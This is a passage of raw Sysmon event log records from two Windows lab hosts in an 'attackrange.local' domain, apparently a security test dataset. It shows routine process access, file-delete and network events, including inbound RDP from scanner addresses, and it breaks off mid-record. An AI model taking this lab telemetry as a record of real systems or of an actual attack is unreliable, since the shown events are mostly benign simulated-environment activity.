14:57:57.873{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-BC0D-00000000BB01}5424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000076525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.299{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57544-false10.0.1.12-8000- 10341000x800000000000000076524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.858{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.858{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}5424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000050436Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.838{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=796247F4DB5D9432301524962FFCA2F2,SHA256=C3BEF57EC28BC82E08DA45F566E0E37AFC677A14812F9EA134618E39D17C335B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050435Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.525{85C0FFC9-EBF6-607E-EE06-00000000BB01}40043588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050434Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBF6-607E-EE06-00000000BB01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050433Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050432Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050431Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050430Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050429Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050428Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050427Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050426Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050425Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050424Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EBF6-607E-EE06-00000000BB01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050423Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBF6-607E-EE06-00000000BB01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050422Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.416{85C0FFC9-EBF6-607E-EE06-00000000BB01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000050421Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.185{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54654-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050420Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.976{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52004-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050419Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:58.103{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B13299907168EEF4DCE9FDA77A06F33A,SHA256=E4BD661759D99D0A3DA5F6DB4986F068423B72AF76615E8F9B3CACCEB6BF2B0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.857{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF7-607E-D30D-00000000BB01}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.842{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.842{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.795{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF7-607E-D20D-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.779{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.779{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.732{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 